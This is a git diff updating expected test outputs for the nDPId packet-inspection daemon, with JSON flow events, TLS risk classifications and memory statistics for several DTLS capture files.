 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507911659964,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1507911659964,"pkt":"AAAAjZtQSEb7zh73CABFAABYGTZAAHIRmTnUINYnPURumfARzzUARCmdFv7\/AAAAAAAAAAAALwMAACMAAAAAAAAAI\/7\/IGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UG"}
 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507911659975,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":155,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":155,"pkt_l4_len":121,"ts_msec":1507911659975,"pkt":"AAAAjZtQSEb7zh73CABFAACN5wIAAD8RPjg9RG6Z1CDWJ8818BEAeRSaFv7\/AAAAAAAAAAEAZAEAAFgAAQAAAAAAWP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAIGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UGABAANQAvAAUABAAKAPsA\/AD9AQA="}
-01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}}
-00757{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":19,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1507911659748,"flow_last_seen":1507911740891,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":2583,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1507911800410,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
-00757{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1507911920885,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
-00757{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":29,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1507911659748,"flow_last_seen":1507911981652,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3545,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1507912041681,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
-00755{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}}
+01024{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":19,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1507911659748,"flow_last_seen":1507911740891,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":2583,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1507911800410,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}}
+01024{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1507911920885,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}}
+01024{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":29,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1507911659748,"flow_last_seen":1507911981652,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3545,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1507912041681,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}}
+01022{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","total-events-serialized":12}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 30/30
@@ -18,10 +18,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595743 bytes
-~~ total memory freed........: 4595743 bytes
-~~ total allocations/frees...: 99585/99585
+~~ total memory allocated....: 4680696 bytes
+~~ total memory freed........: 4680696 bytes
+~~ total allocations/frees...: 101175/101175
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 1079 chars
-~~ json string avg len.......: 687 chars
+~~ json string max len.......: 1346 chars
+~~ json string avg len.......: 820 chars
diff --git a/test/results/dtls_certificate.pcapng.out b/test/results/dtls_certificate.pcapng.out
new file mode 100644
index 000000000..03cae88b0
--- /dev/null
+++ b/test/results/dtls_certificate.pcapng.out
@@ -0,0 +1,21 @@
+00450{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_certificate.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":180000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645461580895,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"ts_msec":1645461580895,"pkt":"AAEC3cZZAAAAw9EGCABFAAXASWxAADQRSEO\/Pjy+o80PtAG7l9wFrJO8Fv79AAAAAAAAAAIARQIAADkAAQAAAAAAOf79\/Kc4HE2ihqeGXU8HJgbvv17oNih5trwpTgkv9KYfrYAAwDAAABH\/AQABAAALAAQDAAECACMAABb+\/QAAAAAAAAADBPILAATmAAIAAAAABOYABOMABOAwggTcMIIDxKADAgECAhMzAAAAHLZ5tboHL3PzAAAAAAAcMA0GCSqGSIb3DQEBBQUAMIGCMQswCQYDVQQGEwJVUzETMBEGA1UECAwKV2FzaGluZ3RvbjEQMA4GA1UEBwwHUmVkbW9uZDEeMBwGA1UECgwVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSwwKgYDVQQDDCNNaWNyb3NvZnQgVXBkYXRlIFNlY3VyZSBTZXJ2ZXIgQ0EgMTAeFw0xNzAyMjcxMjAwMDBaFw0xOTAyMjcwMDAwMDBaMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApXYXNoaW5ndG9uMRAwDgYDVQQHDAdSZWRtb25kMRIwEAYDVQQKDAlNaWNyb3NvZnQxDDAKBgNVBAsMA0RTUDEhMB8GA1UEAwwYd3d3LnVwZGF0ZS5taWNyb3NvZnQuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxchtkZuNapLH78mZf0URm+rRwTx\/ZkyEWQKrdPC7T\/I\/VBlNaCjkhqqLjeWcxNjAXFgHV0DQS4Ohn1NUJhGwRm+C9xnh7uNg5h\/HW\/hZG6rQQT\/YIEe4RMEDoHNucdV0ldNkVXCWmH7VdyXRHfM9s1z8dmKF9BhxFUrUndT8KN51NorrFfTkRDxgaXL\/XiTXb5jjFdTMNDoWEcfCSn+mv6sdX3THlAvFHxknV8wAjqvNtxIjUk2YFzbeaTG2Q+ckuiam9dVPaH56OySqB0JYTcsJNz1EFEanNbn3YoH9U68KtmWqXQruXynN3poT1rVwEUFs6k6P4rp9p9jisxqFTQIDAQABo4IBUTCCAU0wDgYDVR0PAQH\/BAQDAgTwMBMGA1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBSLiU8Spy0D\/BrMqi4FzdoDPizAuzAfBgNVHSMEGDAWgBQTA4kJqE\/7jzADbipdbCNlgXR+uzBmBgNVHR8EXzBdMFugWaBXhlVodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3JsMHMGCCsGAQUFBwEBBGcwZTBjBggrBgEFBQcwAoZXaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3J0MAkGA1UdEwQCMAAwDQYJKoZIhvcNAQEFBQADggEBAD\/XXW3cyN\/n\/BsXYc461vEQJ\/MooDP0uWOe5wtrpd3XUOKUuYcOvN70FidsM66xtY3sgdh6LUV7Vd3UbwrHsVXRThb+W0JmRxLpORJHovyCUjHJdgWcwAmAecZJ4QHbPt4JGKIezh1zC7zvwpMBEph7\/DE2rRq+Bk7Vj\/NpG5hi7ChZs0a\/4ZlQ63BMdels0iVL7Gl8j2rZV6AKE6rNjGoosoCEoztRWeQE8+sRCm+Ke3bWDxj6rORsUQGgzGimwUgWsdfd3Nhsgd7TmdyKcuJKVjK3IJvBgJOkTc6Wtb9I6keqOhJz+tW6pXPpKnm\/uuS9speSYMehXhdxy6auf74W\/v0AAAAAAAAABABGDAABSQADAAAAAAA6AwAXQQTUxAnF4aD29iFX08UpvzSYHoOfJnjbLUY7FaBYVdRtgMBGO\/4Mp6YBV28sDk7JZ2MLOl9WIA=="}
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":180000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}}
+00955{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":180000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}}
+00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","total-events-serialized":6}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 1/1
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 1444 bytes
+~~ total detected protocols..: 1
+~~ total active/idle flows...: 1/1
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4688196 bytes
+~~ total memory freed........: 4688196 bytes
+~~ total allocations/frees...: 101148/101148
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 170 chars
+~~ json string max len.......: 2398 chars
+~~ json string avg len.......: 1289 chars
diff --git a/test/results/dtls_certificate_fragments.pcap.out b/test/results/dtls_certificate_fragments.pcap.out
index 74469d359..3613d2aa6 100644
--- a/test/results/dtls_certificate_fragments.pcap.out
+++ b/test/results/dtls_certificate_fragments.pcap.out
@@ -1,11 +1,11 @@
 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":180000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1556606275726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"ts_msec":1556606275726,"pkt":"AAAAp2BiAAAAtzPNCABFAAFUW5tAAD4Rr1YKusaVI9I7hpmzrZsBQKk0Fv7\/AAAAAAAAAAABKwEAAR8AAAAAAAABH\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAAACgwDDALMAowCTAFMAKAKUAowChAJ8AawBqAGkAaAA5ADgANwA2AIgAhwCGAIXAMsAuwCrAJsAPwAUAnQA9ADUAhMAvwCvAJ8AjwBPACQCkAKIAoACeAGcAQAA\/AD4AMwAyADEAMACaAJkAmACXAEUARABDAELAMcAtwCnAJcAOwAQAnAA8AC8AlgBBAAfAEsAIABYAEwAQAA3ADcADAAoA\/wEAAFUACwAEAwABAgAKABwAGgAXABkAHAAbABgAGgAWAA4ADQALAAwACQAKACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAwAPAAEB"}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":180000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":180000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1556606275848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1556606275848,"pkt":"AAAAp2BiAAAAtzPNCABFIABM4VFAAD4RKogj0juGCrrGla2bmbMAOPKRFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FGas+MFHIUbk58MIduuc4UCKEPlD"}
 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1556606275913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"ts_msec":1556606275913,"pkt":"AAAAp2BiAAAAtzPNCABFAAFoW6pAAD4RrzMKusaVI9I7hpmzrZsBVHbeFv7\/AAAAAAAAAAEBPwEAATMAAQAAAAABM\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAFGas+MFHIUbk58MIduuc4UCKEPlDAKDAMMAswCjAJMAUwAoApQCjAKEAnwBrAGoAaQBoADkAOAA3ADYAiACHAIYAhcAywC7AKsAmwA\/ABQCdAD0ANQCEwC\/AK8AnwCPAE8AJAKQAogCgAJ4AZwBAAD8APgAzADIAMQAwAJoAmQCYAJcARQBEAEMAQsAxwC3AKcAlwA7ABACcADwALwCWAEEAB8ASwAgAFgATABAADcANwAMACgD\/AQAAVQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="}
-00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
-00778{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
